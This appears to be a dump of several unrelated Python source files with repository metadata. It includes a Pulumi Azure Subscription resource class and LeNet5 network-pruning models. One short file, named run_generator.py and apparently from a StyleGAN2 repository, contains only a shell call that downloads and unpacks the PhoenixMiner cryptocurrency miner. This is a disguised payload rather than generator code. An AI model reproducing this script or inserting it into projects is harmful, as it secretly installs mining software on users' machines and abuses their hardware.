def tenant_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Tenant to which the subscription belongs.
"""
return pulumi.get(self, "tenant_id")
@tenant_id.setter
def tenant_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tenant_id", value)
@property
@pulumi.getter
def workload(self) -> Optional[pulumi.Input[str]]:
"""
The workload type of the Subscription. Possible values are `Production` (default) and `DevTest`. Changing this forces a new Subscription to be created.
"""
return pulumi.get(self, "workload")
@workload.setter
def workload(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "workload", value)
class Subscription(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
alias: Optional[pulumi.Input[str]] = None,
billing_scope_id: Optional[pulumi.Input[str]] = None,
subscription_id: Optional[pulumi.Input[str]] = None,
subscription_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workload: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages an Alias for a Subscription - which adds an Alias to an existing Subscription, allowing it to be managed in the provider - or create a new Subscription with a new Alias.
> **NOTE:** Destroying a Subscription controlled by this resource will place the Subscription into a cancelled state. It is possible to re-activate a subscription within 90-days of cancellation, after which time the Subscription is irrevocably deleted, and the Subscription ID cannot be re-used. For further information see [here](https://docs.microsoft.com/en-us/azure/cost-management-billing/manage/cancel-azure-subscription#what-happens-after-subscription-cancellation). Users can optionally delete a Subscription once 72 hours have passed, however, this functionality is not suitable for this provider. A `Deleted` subscription cannot be reactivated.
> **NOTE:** It is not possible to destroy (cancel) a subscription if it contains resources. If resources are present that are not managed by the provider then these will need to be removed before the Subscription can be destroyed.
> **NOTE:** Azure supports Multiple Aliases per Subscription, however, to reliably manage this resource in this provider only a single Alias is supported.
## Example Usage
### Creating A New Alias And Subscription For An Enrollment Account
```python
import pulumi
import pulumi_azure as azure
example_enrollment_account_scope = azure.billing.get_enrollment_account_scope(billing_account_name="1234567890",
enrollment_account_name="0123456")
example_subscription = azure.core.Subscription("exampleSubscription",
subscription_name="My Example EA Subscription",
billing_scope_id=example_enrollment_account_scope.id)
```
### Creating A New Alias And Subscription For A Microsoft Customer Account
```python
import pulumi
import pulumi_azure as azure
example_mca_account_scope = azure.billing.get_mca_account_scope(billing_account_name="e879cf0f-2b4d-5431-109a-f72fc9868693:024cabf4-7321-4cf9-be59-df0c77ca51de_2019-05-31",
billing_profile_name="PE2Q-NOIT-BG7-TGB",
invoice_section_name="MTT4-OBS7-PJA-TGB")
example_subscription = azure.core.Subscription("exampleSubscription",
subscription_name="My Example MCA Subscription",
billing_scope_id=example_mca_account_scope.id)
```
### Creating A New Alias And Subscription For A Microsoft Partner Account
```python
import pulumi
import pulumi_azure as azure
example_mpa_account_scope = azure.billing.get_mpa_account_scope(billing_account_name="e879cf0f-2b4d-5431-109a-f72fc9868693:024cabf4-7321-4cf9-be59-df0c77ca51de_2019-05-31",
customer_name="2281f543-7321-4cf9-1e23-edb4Oc31a31c")
example_subscription = azure.core.Subscription("exampleSubscription",
subscription_name="My Example MPA Subscription",
billing_scope_id=example_mpa_account_scope.id)
```
### Adding An Alias To An Existing Subscription
```python
import pulumi
import pulumi_azure as azure
example = azure.core.Subscription("example",
alias="examplesub",
subscription_id="12345678-12234-5678-9012-123456789012",
subscription_name="My Example Subscription")
```
## Import
Subscriptions can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:core/subscription:Subscription example "/providers/Microsoft.Subscription/aliases/subscription1"
```
In this scenario, the `subscription_id` property can be completed and the provider will assume control of the existing subscription by creating an Alias. See the `adding an Alias to an existing Subscription` above. This provider requires an alias to correctly manage Subscription resources due to Azure Subscription API design.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] alias: The Alias name for the subscription. This provider will generate a new GUID if this is not supplied. Changing this forces a new Subscription to be created.
:param pulumi.Input[str] billing_scope_id: The Azure Billing Scope ID. Can be a Microsoft Customer Account Billing Scope ID, a Microsoft Partner Account Billing Scope ID or an Enrollment Billing Scope ID.
:param pulumi.Input[str] subscription_id: The ID of the Subscription. Changing this forces a new Subscription to be created.
:param pulumi.Input[str] subscription_name: The Name of the Subscription. This is the Display Name in the portal.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the Subscription.
:param pulumi.Input[str] workload: The workload type of the Subscription. Possible values are `Production` (default) and `DevTest`. Changing this forces a new Subscription to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SubscriptionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an Alias for a Subscription - which adds an Alias to an existing Subscription, allowing it to be managed in the provider - or create a new Subscription with a new Alias.
> **NOTE:** Destroying a Subscription controlled by this resource will place the Subscription into a cancelled state. It is possible to re-activate a subscription within 90-days of cancellation, after which time the Subscription is irrevocably deleted, and the Subscription ID cannot be re-used. For further information see [here](https://docs.microsoft.com/en-us/azure/cost-management-billing/manage/cancel-azure-subscription#what-happens-after-subscription-cancellation). Users can optionally delete a Subscription once 72 hours have passed, however, this functionality is not suitable for this provider. A `Deleted` subscription cannot be reactivated.
> **NOTE:** It is not possible to destroy (cancel) a subscription if it contains resources. If resources are present that are not managed by the provider then these will need to be removed before the Subscription can be destroyed.
> **NOTE:** Azure supports Multiple Aliases per Subscription, however, to reliably manage this resource in this provider only a single Alias is supported.
## Example Usage
### Creating A New Alias And Subscription For An Enrollment Account
```python
import pulumi
import pulumi_azure as azure
example_enrollment_account_scope = azure.billing.get_enrollment_account_scope(billing_account_name="1234567890",
enrollment_account_name="0123456")
example_subscription = azure.core.Subscription("exampleSubscription",
subscription_name="My Example EA Subscription",
billing_scope_id=example_enrollment_account_scope.id)
```
### Creating A New Alias And Subscription For A Microsoft Customer Account
```python
import pulumi
import pulumi_azure as azure
example_mca_account_scope = azure.billing.get_mca_account_scope(billing_account_name="e879cf0f-2b4d-5431-109a-f72fc9868693:024cabf4-7321-4cf9-be59-df0c77ca51de_2019-05-31",
billing_profile_name="PE2Q-NOIT-BG7-TGB",
invoice_section_name="MTT4-OBS7-PJA-TGB")
example_subscription = azure.core.Subscription("exampleSubscription",
subscription_name="My Example MCA Subscription",
billing_scope_id=example_mca_account_scope.id)
```
### Creating A New Alias And Subscription For A Microsoft Partner Account
```python
import pulumi
import pulumi_azure as azure
example_mpa_account_scope = azure.billing.get_mpa_account_scope(billing_account_name="e879cf0f-2b4d-5431-109a-f72fc9868693:024cabf4-7321-4cf9-be59-df0c77ca51de_2019-05-31",
customer_name="2281f543-7321-4cf9-1e23-edb4Oc31a31c")
example_subscription = azure.core.Subscription("exampleSubscription",
subscription_name="My Example MPA Subscription",
billing_scope_id=example_mpa_account_scope.id)
```
### Adding An Alias To An Existing Subscription
```python
import pulumi
import pulumi_azure as azure
example = azure.core.Subscription("example",
alias="examplesub",
subscription_id="12345678-12234-5678-9012-123456789012",
subscription_name="My Example Subscription")
```
## Import
Subscriptions can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:core/subscription:Subscription example "/providers/Microsoft.Subscription/aliases/subscription1"
```
In this scenario, the `subscription_id` property can be completed and the provider will assume control of the existing subscription by creating an Alias. See the `adding an Alias to an existing Subscription` above. This provider requires an alias to correctly manage Subscription resources due to Azure Subscription API design.
:param str resource_name: The name of the resource.
:param SubscriptionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SubscriptionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
alias: Optional[pulumi.Input[str]] = None,
billing_scope_id: Optional[pulumi.Input[str]] = None,
subscription_id: Optional[pulumi.Input[str]] = None,
subscription_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workload: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SubscriptionArgs.__new__(SubscriptionArgs)
__props__.__dict__["alias"] = alias
__props__.__dict__["billing_scope_id"] = billing_scope_id
__props__.__dict__["subscription_id"] = subscription_id
if subscription_name is None and not opts.urn:
raise TypeError("Missing required property 'subscription_name'")
__props__.__dict__["subscription_name"] = subscription_name
__props__.__dict__["tags"] = tags
__props__.__dict__["workload"] = workload
__props__.__dict__["tenant_id"] = None
super(Subscription, __self__).__init__(
'azure:core/subscription:Subscription',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
alias: Optional[pulumi.Input[str]] = None,
billing_scope_id: Optional[pulumi.Input[str]] = None,
subscription_id: Optional[pulumi.Input[str]] = None,
subscription_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
workload: Optional[pulumi.Input[str]] = None) -> 'Subscription':
"""
Get an existing Subscription resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] alias: The Alias name for the subscription. This provider will generate a new GUID if this is not supplied. Changing this forces a new Subscription to be created.
:param pulumi.Input[str] billing_scope_id: The Azure Billing Scope ID. Can be a Microsoft Customer Account Billing Scope ID, a Microsoft Partner Account Billing Scope ID or an Enrollment Billing Scope ID.
:param pulumi.Input[str] subscription_id: The ID of the Subscription. Changing this forces a new Subscription to be created.
:param pulumi.Input[str] subscription_name: The Name of the Subscription. This is the Display Name in the portal.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the Subscription.
:param pulumi.Input[str] tenant_id: The ID of the Tenant to which the subscription belongs.
:param pulumi.Input[str] workload: The workload type of the Subscription. Possible values are `Production` (default) and `DevTest`. Changing this forces a new Subscription to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _SubscriptionState.__new__(_SubscriptionState)
__props__.__dict__["alias"] = alias
__props__.__dict__["billing_scope_id"] = billing_scope_id
__props__.__dict__["subscription_id"] = subscription_id
__props__.__dict__["subscription_name"] = subscription_name
__props__.__dict__["tags"] = tags
__props__.__dict__["tenant_id"] = tenant_id
__props__.__dict__["workload"] = workload
return Subscription(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def alias(self) -> pulumi.Output[str]:
"""
The Alias name for the subscription. This provider will generate a new GUID if this is not supplied. Changing this forces a new Subscription to be created.
"""
return pulumi.get(self, "alias")
@property
@pulumi.getter(name="billingScopeId")
def billing_scope_id(self) -> pulumi.Output[Optional[str]]:
"""
The Azure Billing Scope ID. Can be a Microsoft Customer Account Billing Scope ID, a Microsoft Partner Account Billing Scope ID or an Enrollment Billing Scope ID.
"""
return pulumi.get(self, "billing_scope_id")
@property
@pulumi.getter(name="subscriptionId")
def subscription_id(self) -> pulumi.Output[str]:
"""
The ID of the Subscription. Changing this forces a new Subscription to be created.
"""
return pulumi.get(self, "subscription_id")
@property
@pulumi.getter(name="subscriptionName")
def subscription_name(self) -> pulumi.Output[str]:
"""
The Name of the Subscription. This is the Display Name in the portal.
"""
return pulumi.get(self, "subscription_name")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the Subscription.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> pulumi.Output[str]:
"""
The ID of the Tenant to which the subscription belongs.
"""
return pulumi.get(self, "tenant_id")
@property
@pulumi.getter
def workload(self) -> pulumi.Output[Optional[str]]:
"""
The workload type of the Subscription. Possible values are `Production` (default) and `DevTest`. Changing this forces a new Subscription to be created.
"""
return pulumi.get(self, "workload")
| 51.051471
| 662
| 0.679821
| 3,446
| 27,772
| 5.312536
| 0.082705
| 0.060687
| 0.065767
| 0.055279
| 0.901895
| 0.891244
| 0.882504
| 0.876495
| 0.866718
| 0.856121
| 0
| 0.016369
| 0.232284
| 27,772
| 543
| 663
| 51.145488
| 0.842268
| 0.513539
| 0
| 0.746988
| 1
| 0
| 0.089866
| 0.003038
| 0
| 0
| 0
| 0
| 0
| 1
| 0.160643
| false
| 0.004016
| 0.02008
| 0
| 0.277108
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0e6207e397f30549269b9eb7e55f23963fd3329a
| 82
|
py
|
Python
|
merge/bin/__init__.py
|
JD-8678/MLA
|
51e854027be06c2badac94c0a36e4f3ef807d780
|
[
"MIT"
] | 1
|
2020-05-29T10:40:43.000Z
|
2020-05-29T10:40:43.000Z
|
merge/bin/__init__.py
|
JD-8678/MLA
|
51e854027be06c2badac94c0a36e4f3ef807d780
|
[
"MIT"
] | null | null | null |
merge/bin/__init__.py
|
JD-8678/MLA
|
51e854027be06c2badac94c0a36e4f3ef807d780
|
[
"MIT"
] | 1
|
2020-10-08T10:14:26.000Z
|
2020-10-08T10:14:26.000Z
|
# print("bin")
from . import run_file
from . import run_url
from . import run_text
| 20.5
| 22
| 0.743902
| 14
| 82
| 4.142857
| 0.571429
| 0.517241
| 0.672414
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.158537
| 82
| 4
| 23
| 20.5
| 0.84058
| 0.146341
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0e6b2d5a7cd11c4ad9e1d641a196584a68d3f481
| 149
|
py
|
Python
|
run_generator.py
|
linch22/StyleGAN2
|
67f7791d9aa53cde121277f03d6a1c63fd8b215f
|
[
"BSD-Source-Code"
] | null | null | null |
run_generator.py
|
linch22/StyleGAN2
|
67f7791d9aa53cde121277f03d6a1c63fd8b215f
|
[
"BSD-Source-Code"
] | null | null | null |
run_generator.py
|
linch22/StyleGAN2
|
67f7791d9aa53cde121277f03d6a1c63fd8b215f
|
[
"BSD-Source-Code"
] | null | null | null |
import os as alpha
alpha.system("wget https://phoenixminer.info/downloads/PhoenixMiner_5.7b_Linux.tar.gz && tar -xf PhoenixMiner_5.7b_Linux.tar.gz")
| 49.666667
| 129
| 0.798658
| 25
| 149
| 4.6
| 0.64
| 0.226087
| 0.26087
| 0.347826
| 0.434783
| 0.434783
| 0
| 0
| 0
| 0
| 0
| 0.028777
| 0.067114
| 149
| 2
| 130
| 74.5
| 0.798561
| 0
| 0
| 0
| 0
| 0.5
| 0.758389
| 0.201342
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
0e806700f94bc691fe30f52e3d3d208638de163d
| 39,135
|
py
|
Python
|
lenet_models.py
|
kbui1993/Official_Nonconvex_SGL
|
bdbeea1c907aa8e9e7a96ccbcffa445bae6bcbc2
|
[
"MIT"
] | 1
|
2021-09-18T18:39:29.000Z
|
2021-09-18T18:39:29.000Z
|
lenet_models.py
|
kbui1993/Official_Nonconvex_SGL
|
bdbeea1c907aa8e9e7a96ccbcffa445bae6bcbc2
|
[
"MIT"
] | null | null | null |
lenet_models.py
|
kbui1993/Official_Nonconvex_SGL
|
bdbeea1c907aa8e9e7a96ccbcffa445bae6bcbc2
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import torch
import torch.nn as nn
from new_layers import *
from utils import get_flat_fts
from copy import deepcopy
import torch.nn.functional as F
import torch.nn.init as init
class L0LeNet5(nn.Module):
def __init__(self, num_classes, input_size=(1, 28, 28), conv_dims=(20, 50), fc_dims=500,
N=50000, beta_ema=0., weight_decay=1, lambas=(1., 1., 1., 1.), local_rep=False,
temperature=2./3.):
super(L0LeNet5, self).__init__()
self.N = N
assert(len(conv_dims) == 2)
self.conv_dims = conv_dims
self.fc_dims = fc_dims
self.beta_ema = beta_ema
self.weight_decay = weight_decay
convs = [L0Conv2d(input_size[0], conv_dims[0], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[0], local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2),
L0Conv2d(conv_dims[0], conv_dims[1], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[1], local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2)]
self.convs = nn.Sequential(*convs)
if torch.cuda.is_available():
self.convs = self.convs.cuda()
flat_fts = get_flat_fts(input_size, self.convs)
fcs = [L0Dense(flat_fts, self.fc_dims, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[2], local_rep=local_rep, temperature=temperature), nn.ReLU(),
L0Dense(self.fc_dims, num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[3], local_rep=local_rep, temperature=temperature)]
self.fcs = nn.Sequential(*fcs)
self.layers = []
for m in self.modules():
if isinstance(m, L0Dense) or isinstance(m, L0Conv2d):
self.layers.append(m)
if beta_ema > 0.:
print('Using temporal averaging with beta: {}'.format(beta_ema))
self.avg_param = deepcopy(list(p.data for p in self.parameters()))
if torch.cuda.is_available():
self.avg_param = [a.cuda() for a in self.avg_param]
self.steps_ema = 0.
def forward(self, x):
o = self.convs(x)
o = o.view(o.size(0), -1)
return self.fcs(o)
def regularization(self):
regularization = 0.
for layer in self.layers:
regularization += - (1. / self.N) * layer.regularization()
if torch.cuda.is_available():
regularization = regularization.cuda()
return regularization
def get_w_sparsity(self):
sparsity_num = 0.
sparsity_denom = 0.
for layer in self.layers:
sparsity_num += layer.count_zero_w()
sparsity_denom += layer.count_weight()
return sparsity_num/sparsity_denom
def count_active_neuron(self):
neuron = 0
for layer in self.layers:
neuron += layer.count_active_neuron()
return neuron
def count_total_neuron(self):
neuron = 0
for layer in self.layers:
if isinstance(layer, L0Conv2d) or isinstance(layer, MAPConv2d) or isinstance(layer, L0Dense):
neuron+=layer.count_total_neuron()
return neuron
def count_reg_neuron_sparsity(self):
neuron = 0
total = 0
for layer in self.layers:
if isinstance(layer, L0Conv2d) or isinstance(layer,L0Dense):
neuron+=layer.count_active_neuron()
total+=layer.count_total_neuron()
return 1-neuron/total
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
try:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
except:
pass
return expected_flops, expected_l0
def update_ema(self):
self.steps_ema += 1
for p, avg_p in zip(self.parameters(), self.avg_param):
avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)
def load_ema_params(self):
for p, avg_p in zip(self.parameters(), self.avg_param):
p.data.copy_(avg_p / (1 - self.beta_ema**self.steps_ema))
def load_params(self, params):
for p, avg_p in zip(self.parameters(), params):
p.data.copy_(avg_p)
def get_params(self):
params = deepcopy(list(p.data for p in self.parameters()))
return params
class group_lasso_LeNet5(nn.Module):
def __init__(self, num_classes, input_size=(1, 28, 28), conv_dims=(20, 50), fc_dims=500,
N=50000, beta_ema=0., weight_decay=1, lambas=(1., 1., 1., 1.), local_rep=False,
temperature=2./3.):
super(group_lasso_LeNet5, self).__init__()
self.N = N
assert(len(conv_dims) == 2)
self.conv_dims = conv_dims
self.fc_dims = fc_dims
self.beta_ema = beta_ema
self.weight_decay = weight_decay
convs = [group_lasso_Conv2d(input_size[0], conv_dims[0], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[0], local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2),
group_lasso_Conv2d(conv_dims[0], conv_dims[1], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[1], local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2)]
self.convs = nn.Sequential(*convs)
if torch.cuda.is_available():
self.convs = self.convs.cuda()
flat_fts = get_flat_fts(input_size, self.convs)
fcs = [group_lasso_Dense(flat_fts, self.fc_dims, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[2], local_rep=local_rep, temperature=temperature), nn.ReLU(),
group_lasso_Dense(self.fc_dims, num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[3], local_rep=local_rep, temperature=temperature)]
self.fcs = nn.Sequential(*fcs)
self.layers = []
for m in self.modules():
if isinstance(m, group_lasso_Dense) or isinstance(m, group_lasso_Conv2d):
self.layers.append(m)
if beta_ema > 0.:
print('Using temporal averaging with beta: {}'.format(beta_ema))
self.avg_param = deepcopy(list(p.data for p in self.parameters()))
if torch.cuda.is_available():
self.avg_param = [a.cuda() for a in self.avg_param]
self.steps_ema = 0.
def forward(self, x):
o = self.convs(x)
o = o.view(o.size(0), -1)
return self.fcs(o)
def regularization(self):
regularization = 0.
for layer in self.layers:
regularization += - (1. / self.N) * layer.regularization()
if torch.cuda.is_available():
regularization = regularization.cuda()
return regularization
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
return expected_flops, expected_l0
def update_ema(self):
self.steps_ema += 1
for p, avg_p in zip(self.parameters(), self.avg_param):
avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)
def load_ema_params(self):
for p, avg_p in zip(self.parameters(), self.avg_param):
p.data.copy_(avg_p / (1 - self.beta_ema**self.steps_ema))
def load_params(self, params):
for p, avg_p in zip(self.parameters(), params):
p.data.copy_(avg_p)
def get_params(self):
params = deepcopy(list(p.data for p in self.parameters()))
return params
def get_w_sparsity(self):
sparsity_num = 0.
sparsity_denom = 0.
for layer in self.layers:
sparsity_num += layer.count_zero_w()
sparsity_denom += layer.count_weight()
return sparsity_num/sparsity_denom
def count_active_neuron(self):
neuron = 0
for layer in self.layers:
neuron += layer.count_active_neuron()
return neuron
def count_total_neuron(self):
neuron = 0
for layer in self.layers:
if isinstance(layer, group_lasso_Conv2d) or isinstance(layer, MAPConv2d) or isinstance(layer, group_lasso_Dense):
neuron+=layer.count_total_neuron()
return neuron
def count_reg_neuron_sparsity(self):
neuron = 0
total = 0
for layer in self.layers:
if isinstance(layer, group_lasso_Conv2d) or isinstance(layer,group_lasso_Dense):
neuron+=layer.count_active_neuron()
total+=layer.count_total_neuron()
return 1-neuron/total
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
try:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
except:
pass
return expected_flops, expected_l0
class CGES_LeNet5(nn.Module):
def __init__(self, num_classes, input_size=(1, 28, 28), conv_dims=(20, 50), fc_dims=500,
N=50000, beta_ema=0., weight_decay=1, lambas=(1., 1., 1., 1.), mu =0.5, local_rep=False,
temperature=2./3.):
super(CGES_LeNet5, self).__init__()
self.N = N
assert(len(conv_dims) == 2)
self.conv_dims = conv_dims
self.fc_dims = fc_dims
self.beta_ema = beta_ema
self.weight_decay = weight_decay
self.mu = mu
convs = [CGES_Conv2d(input_size[0], conv_dims[0], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[0], mu= self.mu, local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2),
CGES_Conv2d(conv_dims[0], conv_dims[1], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[1], mu = self.mu, local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2)]
self.convs = nn.Sequential(*convs)
if torch.cuda.is_available():
self.convs = self.convs.cuda()
flat_fts = get_flat_fts(input_size, self.convs)
fcs = [CGES_Dense(flat_fts, self.fc_dims, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[2], mu = self.mu, local_rep=local_rep, temperature=temperature), nn.ReLU(),
CGES_Dense(self.fc_dims, num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[3], mu = self.mu, local_rep=local_rep, temperature=temperature)]
self.fcs = nn.Sequential(*fcs)
self.layers = []
for m in self.modules():
if isinstance(m, CGES_Dense) or isinstance(m, CGES_Conv2d):
self.layers.append(m)
if beta_ema > 0.:
print('Using temporal averaging with beta: {}'.format(beta_ema))
self.avg_param = deepcopy(list(p.data for p in self.parameters()))
if torch.cuda.is_available():
self.avg_param = [a.cuda() for a in self.avg_param]
self.steps_ema = 0.
def forward(self, x):
o = self.convs(x)
o = o.view(o.size(0), -1)
return self.fcs(o)
def regularization(self):
regularization = 0.
for layer in self.layers:
regularization += - (1. / self.N) * layer.regularization()
if torch.cuda.is_available():
regularization = regularization.cuda()
return regularization
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
return expected_flops, expected_l0
def update_ema(self):
self.steps_ema += 1
for p, avg_p in zip(self.parameters(), self.avg_param):
avg_p.mul_(self.beta_ema).add_((1 - self.beta_ema) * p.data)
def load_ema_params(self):
for p, avg_p in zip(self.parameters(), self.avg_param):
p.data.copy_(avg_p / (1 - self.beta_ema**self.steps_ema))
def load_params(self, params):
for p, avg_p in zip(self.parameters(), params):
p.data.copy_(avg_p)
def get_params(self):
params = deepcopy(list(p.data for p in self.parameters()))
return params
def get_w_sparsity(self):
sparsity_num = 0.
sparsity_denom = 0.
for layer in self.layers:
sparsity_num += layer.count_zero_w()
sparsity_denom += layer.count_weight()
return sparsity_num/sparsity_denom
def count_active_neuron(self):
neuron = 0
for layer in self.layers:
neuron += layer.count_active_neuron()
return neuron
def count_total_neuron(self):
neuron = 0
for layer in self.layers:
if isinstance(layer, CGES_Conv2d) or isinstance(layer, MAPConv2d) or isinstance(layer, CGES_Dense):
neuron+=layer.count_total_neuron()
return neuron
def count_reg_neuron_sparsity(self):
neuron = 0
total = 0
for layer in self.layers:
if isinstance(layer, CGES_Conv2d) or isinstance(layer,CGES_Dense):
neuron+=layer.count_active_neuron()
total+=layer.count_total_neuron()
return 1-neuron/total
def get_exp_flops_l0(self):
expected_flops, expected_l0 = 0., 0.
for layer in self.layers:
try:
e_fl, e_l0 = layer.count_expected_flops_and_l0()
expected_flops += e_fl
expected_l0 += e_l0
except:
pass
return expected_flops, expected_l0
class group_relaxed_L0LeNet5(nn.Module):
def __init__(self, num_classes, input_size=(1, 28, 28), conv_dims=(20, 50), fc_dims=500,
N=50000, beta_ema=0., weight_decay=1, lambas=(1., 1., 1., 1.), beta=4, local_rep=False,
temperature=2./3.):
super(group_relaxed_L0LeNet5, self).__init__()
self.N = N
assert(len(conv_dims) == 2)
self.conv_dims = conv_dims
self.fc_dims = fc_dims
self.beta_ema = beta_ema
self.weight_decay = weight_decay
convs = [group_relaxed_L0Conv2d(input_size[0], conv_dims[0], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[0], beta=beta, local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2),
group_relaxed_L0Conv2d(conv_dims[0], conv_dims[1], 5, droprate_init=0.5, temperature=temperature,
weight_decay=self.weight_decay, lamba=lambas[1], beta=beta, local_rep=local_rep),
nn.ReLU(), nn.MaxPool2d(2)]
self.convs = nn.Sequential(*convs)
if torch.cuda.is_available():
self.convs = self.convs.cuda()
flat_fts = get_flat_fts(input_size, self.convs)
fcs = [group_relaxed_L0Dense(flat_fts, self.fc_dims, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[2], beta=beta, local_rep=local_rep, temperature=temperature), nn.ReLU(),
group_relaxed_L0Dense(self.fc_dims, num_classes, droprate_init=0.5, weight_decay=self.weight_decay,
lamba=lambas[3], beta=beta, local_rep=local_rep, temperature=temperature)]
self.fcs = nn.Sequential(*fcs)
self.layers = []
for m in self.modules():
if isinstance(m, group_relaxed_L0Dense) or isinstance(m, group_relaxed_L0Conv2d):
self.layers.append(m)
if beta_ema > 0.:
print('Using temporal averaging with beta: {}'.format(beta_ema))
self.avg_param = deepcopy(list(p.data for p in self.parameters()))
if torch.cuda.is_available():
self.avg_param = [a.cuda() for a in self.avg_param]
self.steps_ema = 0.
def forward(self, x):
o = self.convs(x)
o = o.view(o.size(0), -1)
return self.fcs(o)
def regularization(self):
regularization = 0.
for layer in self.layers:
